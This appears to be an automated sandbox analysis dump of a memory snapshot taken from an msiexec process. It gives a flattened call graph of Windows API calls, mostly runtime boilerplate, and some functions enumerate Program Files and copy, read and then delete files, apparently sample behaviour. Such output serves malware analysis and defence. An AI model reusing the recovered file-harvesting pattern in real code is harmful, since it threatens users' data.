6084->6097 6085->6084 6111 1fc71e16 6086->6111 6089 1fc71088 GetFileAttributesW 6090 1fc7109c 6089->6090 6089->6096 6090->6096 6103 1fc7173a 6090->6103 6091 1fc710ca 6092 1fc71e89 5 API calls 6091->6092 6091->6096 6093 1fc710df 6092->6093 6116 1fc711ea 6093->6116 6096->6075 6098 1fc72c40 ___scrt_fastfail 6097->6098 6099 1fc71ea7 lstrcatW lstrlenW 6098->6099 6100 1fc71ec2 6099->6100 6101 1fc71ed1 lstrcatW 6099->6101 6100->6101 6102 1fc71ec7 lstrlenW 6100->6102 6101->6089 6102->6101 6104 1fc71747 ___scrt_fastfail 6103->6104 6131 1fc71cca 6104->6131 6108 1fc7199f 6108->6096 6109 1fc71824 ___scrt_fastfail _strlen 6109->6108 6151 1fc715da 6109->6151 6112 1fc71e29 6111->6112 6115 1fc71e4c 6111->6115 6113 1fc71e2d lstrlenW 6112->6113 6112->6115 6114 1fc71e3f lstrlenW 6113->6114 6113->6115 6114->6115 6115->6091 6117 1fc7120e ___scrt_fastfail 6116->6117 6118 1fc71e89 5 API calls 6117->6118 6119 1fc71220 GetFileAttributesW 6118->6119 6120 1fc71246 6119->6120 6121 1fc71235 6119->6121 6122 1fc71e89 5 API calls 6120->6122 6121->6120 6123 1fc7173a 35 API calls 6121->6123 6124 1fc71258 6122->6124 6123->6120 6125 1fc710f1 56 API calls 6124->6125 6126 1fc7126d 6125->6126 6127 1fc71e89 5 API calls 6126->6127 6128 1fc7127f ___scrt_fastfail 6127->6128 6129 1fc710f1 56 API calls 6128->6129 6130 1fc712e6 6129->6130 6130->6096 6132 1fc71cf1 ___scrt_fastfail 6131->6132 6133 1fc71d0f CopyFileW CreateFileW 6132->6133 6134 1fc71d55 GetFileSize 6133->6134 6135 1fc71d44 DeleteFileW 6133->6135 6136 1fc71ede 22 API calls 6134->6136 6140 1fc71808 6135->6140 6137 1fc71d66 ReadFile 6136->6137 6138 1fc71d94 CloseHandle DeleteFileW 6137->6138 6139 1fc71d7d CloseHandle DeleteFileW 6137->6139 6138->6140 6139->6140 6140->6108 6141 1fc71ede 6140->6141 6143 1fc7222f 6141->6143 6144 1fc7224e 6143->6144 6147 1fc72250 6143->6147 6159 1fc7474f 6143->6159 6164 1fc747e5 6143->6164 6144->6109 6146 1fc72908 6148 1fc735d2 __CxxThrowException@8 RaiseException 6146->6148 6147->6146 6171 1fc735d2 6147->6171 6149 1fc72925 6148->6149 6149->6109 6152 1fc7160c _strcat _strlen 6151->6152 6153 1fc7163c lstrlenW 6152->6153 6259 1fc71c9d 6153->6259 6155 1fc71655 lstrcatW lstrlenW 6156 1fc71678 6155->6156 6157 1fc71693 ___scrt_fastfail 6156->6157 6158 1fc7167e lstrcatW 6156->6158 6157->6109 6158->6157 6174 1fc74793 6159->6174 6161 1fc74765 6180 1fc72ada 6161->6180 6163 1fc7478f 6163->6143 6169 1fc756d0 __dosmaperr 6164->6169 6165 1fc7570e 6193 1fc76368 6165->6193 6167 1fc756f9 RtlAllocateHeap 6168 1fc7570c 6167->6168 6167->6169 6168->6143 6169->6165 6169->6167 6170 1fc7474f __dosmaperr 7 API calls 6169->6170 6170->6169 6172 1fc735f2 RaiseException 6171->6172 6172->6146 6175 1fc7479f ___DestructExceptionObject 6174->6175 6187 1fc75671 RtlEnterCriticalSection 6175->6187 6177 1fc747aa 6188 1fc747dc 6177->6188 6179 1fc747d1 _abort 6179->6161 6181 1fc72ae5 IsProcessorFeaturePresent 6180->6181 6182 1fc72ae3 6180->6182 6184 1fc72b58 6181->6184 6182->6163 6192 1fc72b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6184->6192 6186 1fc72c3b 6186->6163 6187->6177 6191 1fc756b9 RtlLeaveCriticalSection 6188->6191 6190 1fc747e3 6190->6179 6191->6190 6192->6186 6196 1fc75b7a GetLastError 6193->6196 6197 1fc75b93 6196->6197 6198 1fc75b99 6196->6198 6215 1fc75e08 6197->6215 6202 1fc75bf0 SetLastError 6198->6202 6222 1fc7637b 6198->6222 6204 1fc75bf9 6202->6204 6203 1fc75bb3 6229 1fc7571e 6203->6229 6204->6168 6208 1fc75bcf 6242 1fc7593c 6208->6242 6209 1fc75bb9 6211 1fc75be7 SetLastError 6209->6211 6211->6204 6213 1fc7571e _free 17 API calls 6214 1fc75be0 6213->6214 6214->6202 6214->6211 6247 1fc75c45 6215->6247 6217 1fc75e2f 6218 1fc75e47 TlsGetValue 6217->6218 6220 1fc75e3b 6217->6220 6218->6220 6219 1fc72ada _ValidateLocalCookies 5 API calls 6221 1fc75e58 6219->6221 6220->6219 6221->6198 6227 1fc76388 __dosmaperr 6222->6227 6223 1fc763c8 6226 1fc76368 _free 19 API calls 6223->6226 6224 1fc763b3 RtlAllocateHeap 6225 1fc75bab 6224->6225 6224->6227 6225->6203 6235 1fc75e5e 6225->6235 6226->6225 6227->6223 6227->6224 6228 1fc7474f __dosmaperr 7 API calls 6227->6228 6228->6227 6230 1fc75752 _free 6229->6230 6231 1fc75729 HeapFree 6229->6231 6230->6209 6231->6230 6232 1fc7573e 6231->6232 6233 1fc76368 _free 18 API calls 6232->6233 6234 1fc75744 GetLastError 6233->6234 6234->6230 6236 1fc75c45 __dosmaperr 5 API calls 6235->6236 6237 1fc75e85 6236->6237 6238 1fc75e94 6237->6238 6239 1fc75ea0 TlsSetValue 6237->6239 6240 1fc72ada _ValidateLocalCookies 5 API calls 6238->6240 6239->6238 6241 1fc75bc8 6240->6241 6241->6203 6241->6208 6253 1fc75914 6242->6253 6248 1fc75c71 6247->6248 6252 1fc75c75 __crt_fast_encode_pointer 6247->6252 6249 1fc75c95 6248->6249 6250 1fc75ce1 __dosmaperr LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 6248->6250 6248->6252 6251 1fc75ca1 GetProcAddress 6249->6251 6249->6252 6250->6248 6251->6252 6252->6217 6254 1fc75854 __dosmaperr RtlEnterCriticalSection RtlLeaveCriticalSection 6253->6254 6255 1fc75938 6254->6255 6256 1fc758c4 6255->6256 6257 1fc75758 __dosmaperr 20 API calls 6256->6257 6258 1fc758e8 6257->6258 6258->6213 6260 1fc71ca6 _strlen 6259->6260 6260->6155 7692 1fc720db 7693 1fc720e7 ___DestructExceptionObject 7692->7693 7694 1fc72110 dllmain_raw 7693->7694 7699 1fc7210b 7693->7699 7703 1fc720f6 7693->7703 7695 1fc7212a 7694->7695 7694->7703 7705 1fc71eec 7695->7705 7697 1fc72177 7698 1fc71eec 31 API calls 7697->7698 7697->7703 7700 1fc7218a 7698->7700 7699->7697 7702 1fc71eec 31 API calls 7699->7702 7699->7703 7701 1fc72193 dllmain_raw 7700->7701 7700->7703 7701->7703 7704 1fc7216d dllmain_raw 7702->7704 7704->7697 7706 1fc71ef7 7705->7706 7707 1fc71f2a dllmain_crt_process_detach 7705->7707 7708 1fc71f1c dllmain_crt_process_attach 7706->7708 7709 1fc71efc 7706->7709 7714 1fc71f06 7707->7714 7708->7714 7710 1fc71f12 7709->7710 7711 1fc71f01 7709->7711 7720 1fc723ec 7710->7720 7711->7714 7715 1fc7240b 7711->7715 7714->7699 7728 1fc753e5 7715->7728 7821 1fc73513 7720->7821 7725 1fc72408 7725->7714 7726 1fc7351e 7 API calls 7727 1fc723f5 7726->7727 7727->7714 7734 1fc75aca 7728->7734 7731 1fc7351e 7810 1fc73820 7731->7810 7733 1fc72415 7733->7714 7735 1fc72410 7734->7735 7736 1fc75ad4 7734->7736 7735->7731 7737 1fc75e08 __dosmaperr 11 API calls 7736->7737 7738 1fc75adb 7737->7738 7738->7735 7739 1fc75e5e __dosmaperr 11 API calls 7738->7739 7740 1fc75aee 7739->7740 7742 1fc759b5 7740->7742 7743 1fc759d0 7742->7743 7744 1fc759c0 7742->7744 7743->7735 7748 1fc759d6 7744->7748 7747 1fc7571e _free 20 API calls 7747->7743 7749 1fc759e9 7748->7749 7752 1fc759ef 7748->7752 7750 1fc7571e _free 20 API calls 7749->7750 7750->7752 7751 1fc7571e _free 20 API calls 7753 1fc759fb 7751->7753 7752->7751 7754 1fc7571e _free 20 API calls 7753->7754 7755 1fc75a06 7754->7755 7756 1fc7571e _free 20 API calls 7755->7756 7757 1fc75a11 7756->7757 7758 1fc7571e _free 20 API calls 7757->7758 7759 1fc75a1c 7758->7759 7760 1fc7571e _free 20 API calls 7759->7760 7761 1fc75a27 7760->7761 7762 1fc7571e _free 20 API calls 7761->7762 7763 1fc75a32 7762->7763 7764 1fc7571e _free 20 API calls 7763->7764 7765 1fc75a3d 7764->7765 7766 1fc7571e _free 20 API calls 7765->7766 7767 1fc75a48 7766->7767 7768 1fc7571e _free 20 API calls 7767->7768 7769 1fc75a56 7768->7769 7774 1fc7589c 7769->7774 7780 1fc757a8 7774->7780 7776 1fc758c0 7777 1fc758ec 7776->7777 7793 1fc75809 7777->7793 7779 1fc75910 7779->7747 7781 1fc757b4 ___DestructExceptionObject 7780->7781 7788 1fc75671 RtlEnterCriticalSection 7781->7788 7783 1fc757be 7786 1fc7571e _free 20 API calls 7783->7786 7787 1fc757e8 7783->7787 7785 1fc757f5 _abort 7785->7776 7786->7787 7789 1fc757fd 7787->7789 7788->7783 7792 1fc756b9 RtlLeaveCriticalSection 7789->7792 7791 1fc75807 7791->7785 7792->7791 7794 1fc75815 ___DestructExceptionObject 7793->7794 7801 1fc75671 RtlEnterCriticalSection 7794->7801 7796 1fc7581f 7802 1fc75a7f 7796->7802 7798 1fc75832 7806 1fc75848 7798->7806 7800 1fc75840 _abort 7800->7779 7801->7796 7803 1fc75a8e __fassign 7802->7803 7805 1fc75ab5 __fassign 7802->7805 7804 1fc77cc2 __fassign 20 API calls 7803->7804 7803->7805 7804->7805 7805->7798 7809 1fc756b9 RtlLeaveCriticalSection 7806->7809 7808 1fc75852 7808->7800 7809->7808 7811 1fc7382d 7810->7811 7815 1fc7384b ___vcrt_freefls@4 7810->7815 7812 1fc7383b 7811->7812 7816 1fc73b67 7811->7816 7813 1fc73ba2 ___vcrt_FlsSetValue 6 API calls 7812->7813 7813->7815 7815->7733 7817 1fc73a82 try_get_function 5 API calls 7816->7817 7818 1fc73b81 7817->7818 7819 1fc73b99 TlsGetValue 7818->7819 7820 1fc73b8d 7818->7820 7819->7820 7820->7812 7827 1fc73856 7821->7827 7823 1fc723f1 7823->7727 7824 1fc753da 7823->7824 7825 1fc75b7a __dosmaperr 20 API calls 7824->7825 7826 1fc723fd 7825->7826 7826->7725 7826->7726 7828 1fc73862 GetLastError 7827->7828 7829 1fc7385f 7827->7829 7830 1fc73b67 ___vcrt_FlsGetValue 6 API calls 7828->7830 7829->7823 7831 1fc73877 7830->7831 7832 1fc738dc SetLastError 7831->7832 7833 1fc73ba2 ___vcrt_FlsSetValue 6 API calls 7831->7833 7838 1fc73896 7831->7838 7832->7823 7834 1fc73890 7833->7834 7835 1fc73ba2 ___vcrt_FlsSetValue 6 API calls 7834->7835 7837 1fc738b8 7834->7837 7834->7838 7835->7837 7836 1fc73ba2 ___vcrt_FlsSetValue 6 API calls 7836->7838 7837->7836 7837->7838 7838->7832 7960 1fc76664 7961 1fc76675 7960->7961 7962 1fc72ada _ValidateLocalCookies 5 API calls 7961->7962 7963 1fc76701 7962->7963 7458 1fc76761 7459 1fc766e6 7458->7459 7460 1fc7677f 7458->7460 7461 1fc766f2 7459->7461 7462 1fc766eb FindClose 7459->7462 7466 1fc781a0 7460->7466 7464 1fc72ada _ValidateLocalCookies 5 API calls 7461->7464 7462->7461 7465 1fc76701 7464->7465 7467 1fc781d9 7466->7467 7468 1fc781dd 7467->7468 7479 1fc78205 7467->7479 7469 1fc76368 _free 20 API calls 7468->7469 7471 1fc781e2 7469->7471 7470 1fc78529 7472 1fc72ada _ValidateLocalCookies 5 API calls 7470->7472 7473 1fc762ac ___std_exception_copy 26 API calls 7471->7473 7474 1fc78536 7472->7474 7475 1fc781ed 7473->7475 7474->7459 7476 1fc72ada _ValidateLocalCookies 5 API calls 7475->7476 7478 1fc781f9 7476->7478 7478->7459 7479->7470 7480 1fc780c0 7479->7480 7483 1fc780db 7480->7483 7481 1fc72ada _ValidateLocalCookies 5 API calls 7482 1fc78152 7481->7482 7482->7479 7483->7481 7484 1fc79d61 7485 1fc79d81 7484->7485 7488 1fc79db8 7485->7488 7487 1fc79dab 7489 1fc79dbf 7488->7489 7490 1fc79ddf 7489->7490 7491 1fc79e20 7489->7491 7492 1fc7a90e 7490->7492 7495 1fc7aa17 21 API calls 7490->7495 7491->7492 7493 1fc7aa17 21 API calls 7491->7493 7492->7487 7494 1fc79e6e 7493->7494 7494->7487 7496 1fc7a93e 7495->7496 7496->7487 6894 1fc7a1e0 6897 1fc7a1fe 6894->6897 6896 1fc7a1f6 6901 1fc7a203 6897->6901 6899 1fc7a298 6899->6896 6901->6899 6902 1fc7aa53 6901->6902 6903 1fc7aa70 RtlDecodePointer 6902->6903 6904 1fc7aa80 6902->6904 6903->6904 6905 1fc7ab0d 6904->6905 6908 1fc7ab02 6904->6908 6910 1fc7aab7 6904->6910 6905->6908 6909 1fc76368 _free 20 API calls 6905->6909 6906 1fc72ada _ValidateLocalCookies 5 API calls 6907 1fc7a42f 6906->6907 6907->6896 6908->6906 6909->6908 6910->6908 6911 1fc76368 _free 20 API calls 6910->6911 6911->6908 7964 1fc77260 GetStartupInfoW 7965 1fc77286 7964->7965 7966 1fc77318 7964->7966 7965->7966 7967 1fc78be3 27 API calls 7965->7967 7968 1fc772af 7967->7968 7968->7966 7969 1fc772dd GetFileType 7968->7969 7969->7968 7970 1fc7506f 7971 1fc75081 7970->7971 7972 1fc75087 7970->7972 7973 1fc75000 20 API calls 7971->7973 7973->7972 6912 1fc765ec 6917 1fc767bf 6912->6917 6915 1fc7571e _free 20 API calls 6916 1fc765ff 6915->6916 6922 1fc767f4 6917->6922 6920 1fc765f6 6920->6915 6921 1fc7571e _free 20 API calls 6921->6920 6923 1fc76806 6922->6923 6924 1fc767cd 6922->6924 6925 1fc76836 6923->6925 6926 1fc7680b 6923->6926 6924->6920 6924->6921 6925->6924 6933 1fc771d6 6925->6933 6927 1fc7637b __dosmaperr 20 API calls 6926->6927 6928 1fc76814 6927->6928 6930 1fc7571e _free 20 API calls 6928->6930 6930->6924 6931 1fc76851 6932 1fc7571e _free 20 API calls 6931->6932 6932->6924 6934 1fc771e1 6933->6934 6935 1fc77209 6934->6935 6936 1fc771fa 6934->6936 6939 1fc77218 6935->6939 6942 1fc78a98 6935->6942 6937 1fc76368 _free 20 API calls 6936->6937 6941 1fc771ff ___scrt_fastfail 6937->6941 6949 1fc78acb 6939->6949 6941->6931 6943 1fc78aa3 6942->6943 6944 1fc78ab8 RtlSizeHeap 6942->6944 6945 1fc76368 _free 20 API calls 6943->6945 6944->6939 6946 1fc78aa8 6945->6946 6947 1fc762ac ___std_exception_copy 26 API calls 6946->6947 6948 1fc78ab3 6947->6948 6948->6939 6950 1fc78ae3 6949->6950 6951 1fc78ad8 6949->6951 6953 1fc78aeb 6950->6953 6959 1fc78af4 __dosmaperr 6950->6959 6952 1fc756d0 21 API calls 6951->6952 6957 1fc78ae0 6952->6957 6954 1fc7571e _free 20 API calls 6953->6954 6954->6957 6955 1fc78b1e RtlReAllocateHeap 6955->6957 6955->6959 6956 1fc78af9 6958 1fc76368 _free 20 API calls 6956->6958 6957->6941 6958->6957 6959->6955 6959->6956 6960 1fc7474f __dosmaperr 7 API calls 6959->6960 6960->6959 6961 1fc785eb 6963 1fc7853a 6961->6963 6962 1fc7854f 6964 1fc76368 _free 20 API calls 6962->6964 6965 1fc78554 6962->6965 6963->6962 6963->6965 6968 1fc7858b 6963->6968 6966 1fc7857a 6964->6966 6967 1fc762ac ___std_exception_copy 26 API calls 6966->6967 6967->6965 6968->6965 6969 1fc76368 _free 20 API calls 6968->6969 6969->6966 7974 1fc7ac6b 7975 1fc7ac84 __startOneArgErrorHandling 7974->7975 7977 1fc7acad __startOneArgErrorHandling 7975->7977 7978 1fc7b2f0 7975->7978 7979 1fc7b329 __startOneArgErrorHandling 7978->7979 7980 1fc7b350 __startOneArgErrorHandling 7979->7980 7981 1fc7b5c1 __raise_exc RaiseException 7979->7981 7982 1fc7b393 7980->7982 7984 1fc7b36e 7980->7984 7981->7980 7983 1fc7b8b2 __startOneArgErrorHandling 20 API calls 7982->7983 7986 1fc7b38e __startOneArgErrorHandling 7983->7986 7989 1fc7b8e1 7984->7989 7987 1fc72ada _ValidateLocalCookies 5 API calls 7986->7987 7988 1fc7b3b7 7987->7988 7988->7977 7990 1fc7b8f0 7989->7990 7991 1fc7b964 __startOneArgErrorHandling 7990->7991 7992 1fc7b90f __startOneArgErrorHandling 7990->7992 7994 1fc7b8b2 __startOneArgErrorHandling 20 API calls 7991->7994 7993 1fc778a3 __startOneArgErrorHandling 5 API calls 7992->7993 7995 1fc7b950 7993->7995 7997 1fc7b95d 7994->7997 7996 1fc7b8b2 __startOneArgErrorHandling 20 API calls 7995->7996 7995->7997 7996->7997 7997->7986 7998 1fc79e71 7999 1fc79e95 7998->7999 8000 1fc79eae 7999->8000 8002 1fc7ac6b __startOneArgErrorHandling 7999->8002 8001 1fc79ef8 8000->8001 8003 1fc7aa53 21 API calls 8000->8003 8004 1fc7acad __startOneArgErrorHandling 8002->8004 8005 1fc7b2f0 21 API calls 8002->8005 8003->8001 8005->8004 7497 1fc73370 7508 1fc73330 7497->7508 7509 1fc73342 7508->7509 7510 1fc7334f 7508->7510 7511 1fc72ada _ValidateLocalCookies 5 API calls 7509->7511 7511->7510 6970 1fc75bff 6978 1fc75d5c 6970->6978 6973 1fc75c13 6974 1fc75b7a __dosmaperr 20 API calls 6975 1fc75c1b 6974->6975 6976 1fc75c28 6975->6976 6985 1fc75c2b 6975->6985 6979 1fc75c45 __dosmaperr 5 API calls 6978->6979 6980 1fc75d83 6979->6980 6981 1fc75d9b TlsAlloc 6980->6981 6984 1fc75d8c 6980->6984 6981->6984 6982 1fc72ada _ValidateLocalCookies 5 API calls 6983 1fc75c09 6982->6983 6983->6973 6983->6974 6984->6982 6986 1fc75c35 6985->6986 6987 1fc75c3b 6985->6987 6989 1fc75db2 6986->6989 6987->6973 6990 1fc75c45 __dosmaperr 5 API calls 6989->6990 6991 1fc75dd9 6990->6991 6992 1fc75df1 TlsFree 6991->6992 6993 1fc75de5 6991->6993 6992->6993 6994 1fc72ada _ValidateLocalCookies 5 API calls 6993->6994 6995 1fc75e02 6994->6995 6995->6987 7512 1fc75303 7515 1fc750a5 7512->7515 7524 1fc7502f 7515->7524 7518 1fc7502f 5 API calls 7519 1fc750c3 7518->7519 7528 1fc75000 7519->7528 7522 1fc75000 20 API calls 7523 1fc750d9 7522->7523 7525 1fc75048 7524->7525 7526 1fc72ada _ValidateLocalCookies 5 API calls 7525->7526 7527 1fc75069 7526->7527 7527->7518 7532 1fc7500d 7528->7532 7533 1fc7502a 7528->7533 7529 1fc75024 7531 1fc7571e _free 20 API calls 7529->7531 7530 1fc7571e _free 20 API calls 7530->7532 7531->7533 7532->7529 7532->7530 7533->7522 7534 1fc77103 GetCommandLineA GetCommandLineW 7839 1fc77a80 7840 1fc77a8d 7839->7840 7841 1fc7637b __dosmaperr 20 API calls 7840->7841 7842 1fc77aa7 7841->7842 7843 1fc7571e _free 20 API calls 7842->7843 7844 1fc77ab3 7843->7844 7845 1fc7637b __dosmaperr 20 API calls 7844->7845 7849 1fc77ad9 7844->7849 7846 1fc77acd 7845->7846 7848 1fc7571e _free 20 API calls 7846->7848 7847 1fc75eb7 11 API calls 7847->7849 7848->7849 7849->7847 7850 1fc77ae5 7849->7850 8006 1fc7220c 8007 1fc72215 8006->8007 8008 1fc7221a dllmain_dispatch 8006->8008 8010 1fc722b1 8007->8010 8011 1fc722c7 8010->8011 8013 1fc722d0 8011->8013 8014 1fc72264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 8011->8014 8013->8008 8014->8013 7855 1fc78a89 7856 1fc76d60 51 API calls 7855->7856 7857 1fc78a8e 7856->7857 7858 1fc73c90 RtlUnwind 8015 1fc7281c 8016 1fc72882 std::exception::exception 27 API calls 8015->8016 8017 1fc7282a 8016->8017 6996 1fc7679a 6997 1fc767a4 6996->6997 6998 1fc767b4 6997->6998 6999 1fc7571e _free 20 API calls 6997->6999 7000 1fc7571e _free 20 API calls 6998->7000 6999->6997 7001 1fc767bb 7000->7001 7859 1fc74a9a 7862 1fc75411 7859->7862 7863 1fc7541d _abort 7862->7863 7864 1fc75af6 _abort 38 API calls 7863->7864 7867 1fc75422 7864->7867 7865 1fc755a8 _abort 38 API calls 7866 1fc7544c 7865->7866 7867->7865 8018 1fc72418 8019 1fc72420 ___scrt_release_startup_lock 8018->8019 8022 1fc747f5 8019->8022 8021 1fc72448 8023 1fc74804 8022->8023 8024 1fc74808 8022->8024 8023->8021 8027 1fc74815 8024->8027 8028 1fc75b7a __dosmaperr 20 API calls 8027->8028 8031 1fc7482c 8028->8031 8029 1fc72ada _ValidateLocalCookies 5 API calls 8030 1fc74811 8029->8030 8030->8021 8031->8029 7002 1fc7c7a7 7003 1fc7c7be 7002->7003 7004 1fc7c80d 7002->7004 7003->7004 7011 1fc7c7e6 GetModuleHandleA 7003->7011 7005 1fc7c835 GetModuleHandleA 7004->7005 7006 1fc7c872 7004->7006 7008 1fc7c85f GetProcAddress 7004->7008 7005->7004 7008->7004 7012 1fc7c7ef 7011->7012 7018 1fc7c80d 7011->7018 7020 1fc7c803 GetProcAddress 7012->7020 7014 1fc7c835 GetModuleHandleA 7014->7018 7015 1fc7c872 7018->7014 7018->7015 7019 1fc7c85f GetProcAddress 7018->7019 7019->7018 7024 1fc7c80d 7020->7024 7021 1fc7c835 GetModuleHandleA 7021->7024 7022 1fc7c872 7023 1fc7c85f GetProcAddress 7023->7024 7024->7021 7024->7022 7024->7023 7025 1fc721a1 ___scrt_dllmain_exception_filter 7868 1fc760ac 7869 1fc760dd 7868->7869 7871 1fc760b7 7868->7871 7870 1fc760c7 FreeLibrary 7870->7871 7871->7869 7871->7870 8032 1fc7742b 8033 1fc77430 8032->8033 8035 1fc77453 8033->8035 8036 1fc78bae 8033->8036 8037 1fc78bdd 8036->8037 8038 1fc78bbb 8036->8038 8037->8033 8039 1fc78bd7 8038->8039 8040 1fc78bc9 RtlDeleteCriticalSection 8038->8040 8041 1fc7571e _free 20 API calls 8039->8041 8040->8039 8040->8040 8041->8037 7872 1fc73eb3 7873 1fc75411 38 API calls 7872->7873 7874 1fc73ebb 7873->7874 8042 1fc75630 8043 1fc7563b 8042->8043 8044 1fc75eb7 11 API calls 8043->8044 8045 1fc75664 8043->8045 8046 1fc75660 8043->8046 8044->8043 8048 1fc75688 8045->8048 8049 1fc756b4 8048->8049 8050 1fc75695 8048->8050 8049->8046 8051 1fc7569f RtlDeleteCriticalSection 8050->8051 8051->8049 8051->8051 7535 1fc71f3f 7536 1fc71f4b ___DestructExceptionObject 7535->7536 7553 1fc7247c 7536->7553 7538 1fc71f52 7539 1fc72041 7538->7539 7540 1fc71f7c 7538->7540 7547 1fc71f57 ___scrt_is_nonwritable_in_current_image 7538->7547 7576 1fc72639 IsProcessorFeaturePresent 7539->7576 7564 1fc723de 7540->7564 7543 1fc72048 7544 1fc71f8b __RTC_Initialize 7544->7547 7567 1fc722fc RtlInitializeSListHead 7544->7567 7546 1fc71f99 ___scrt_initialize_default_local_stdio_options 7568 1fc746c5 7546->7568 7551 1fc71fb8 7551->7547 7552 1fc74669 _abort 5 API calls 7551->7552 7552->7547 7554 1fc72485 7553->7554 7580 1fc72933 IsProcessorFeaturePresent 7554->7580 7558 1fc72496 7563 1fc7249a 7558->7563 7591 1fc753c8 7558->7591 7561 1fc724b1 7561->7538 7562 1fc73529 ___vcrt_uninitialize 8 API calls 7562->7563 7563->7538 7627 1fc724b5 7564->7627 7566 1fc723e5 7566->7544 7567->7546 7569 1fc746dc 7568->7569 7570 1fc72ada _ValidateLocalCookies 5 API calls 7569->7570 7571 1fc71fad 7570->7571 7571->7547 7572 1fc723b3 7571->7572 7573 1fc723b8 ___scrt_release_startup_lock 7572->7573 7574 1fc72933 ___isa_available_init IsProcessorFeaturePresent 7573->7574 7575 1fc723c1 7573->7575 7574->7575 7575->7551 7577 1fc7264e ___scrt_fastfail 7576->7577 7578 1fc726f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7577->7578 7579 1fc72744 ___scrt_fastfail 7578->7579 7579->7543 7581 1fc72491 7580->7581 7582 1fc734ea 7581->7582 7583 1fc734ef ___vcrt_initialize_winapi_thunks 7582->7583 7594 1fc73936 7583->7594 7586 1fc734fd 7586->7558 7588 1fc73505 7589 1fc73510 7588->7589 7590 1fc73972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 7588->7590 7589->7558 7590->7586 7623 1fc77457 7591->7623 7595 1fc7393f 7594->7595 7597 1fc73968 7595->7597 7599 1fc734f9 7595->7599 7608 1fc73be0 7595->7608 7598 1fc73972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 7597->7598 7598->7599 7599->7586 7600 1fc738e8 7599->7600 7613 1fc73af1 7600->7613 7603 1fc738fd 7603->7588 7606 1fc73918 7606->7588 7607 1fc7391b ___vcrt_uninitialize_ptd 6 API calls 7607->7603 7609 1fc73a82 try_get_function 5 API calls 7608->7609 7610 1fc73bfa 7609->7610 7611 1fc73c18 InitializeCriticalSectionAndSpinCount 7610->7611 7612 1fc73c03 7610->7612 7611->7612 7612->7595 7614 1fc73a82 try_get_function 5 API calls 7613->7614 7615 1fc73b0b 7614->7615 7616 1fc73b24 TlsAlloc 7615->7616 7617 1fc738f2 7615->7617 7617->7603 7618 1fc73ba2 7617->7618 7619 1fc73a82 try_get_function 5 API calls 7618->7619 7620 1fc73bbc 7619->7620 7621 1fc73bd7 TlsSetValue 7620->7621 7622 1fc7390b 7620->7622 7621->7622 7622->7606 7622->7607 7626 1fc77470 7623->7626 7624 1fc72ada _ValidateLocalCookies 5 API calls 7625 1fc724a3 7624->7625 7625->7561 7625->7562 7626->7624 7628 1fc724c4 7627->7628 7629 1fc724c8 7627->7629 7628->7566 7630 1fc72639 ___scrt_fastfail 4 API calls 7629->7630 7632 1fc724d5 ___scrt_release_startup_lock 7629->7632 7631 1fc72559 7630->7631 7632->7566 8052 1fc7543d 8053 1fc75440 8052->8053 8054 1fc755a8 _abort 38 API calls 8053->8054 8055 1fc7544c 8054->8055

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 1FC71137
                                                                                                          • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 1FC71151
                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1FC7115C
                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1FC7116D
                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1FC7117C
                                                                                                          • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 1FC71193
                                                                                                          • FindNextFileW.KERNELBASE(00000000,00000010), ref: 1FC711D0
                                                                                                          • FindClose.KERNEL32(00000000), ref: 1FC711DB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.3028279793.000000001FC71000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FC70000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.3028253830.000000001FC70000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.3028279793.000000001FC86000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_1fc70000_msiexec.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                          • String ID:
                                                                                                          • API String ID: 1083526818-0
                                                                                                          • Opcode ID: 484e5f0a1f2378431c89853a515d02f423eeaa3d0fcd405ea79e6df1925cba81
                                                                                                          • Instruction ID: 962abfc0387f388050e4b085891a881be4569700b88bd8cca64cdcd3e1b509a6
                                                                                                          • Opcode Fuzzy Hash: 484e5f0a1f2378431c89853a515d02f423eeaa3d0fcd405ea79e6df1925cba81
                                                                                                          • Instruction Fuzzy Hash: 2C21A5725043596BD710EA649C48FDB7BDCFF84724F000B2AFA58D7190EB31E6189796

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 1FC71434
                                                                                                            • Part of subcall function 1FC710F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 1FC71137
                                                                                                            • Part of subcall function 1FC710F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 1FC71151
                                                                                                            • Part of subcall function 1FC710F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1FC7115C
                                                                                                            • Part of subcall function 1FC710F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1FC7116D
                                                                                                            • Part of subcall function 1FC710F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1FC7117C
                                                                                                            • Part of subcall function 1FC710F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 1FC71193
                                                                                                            • Part of subcall function 1FC710F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 1FC711D0
                                                                                                            • Part of subcall function 1FC710F1: FindClose.KERNEL32(00000000), ref: 1FC711DB
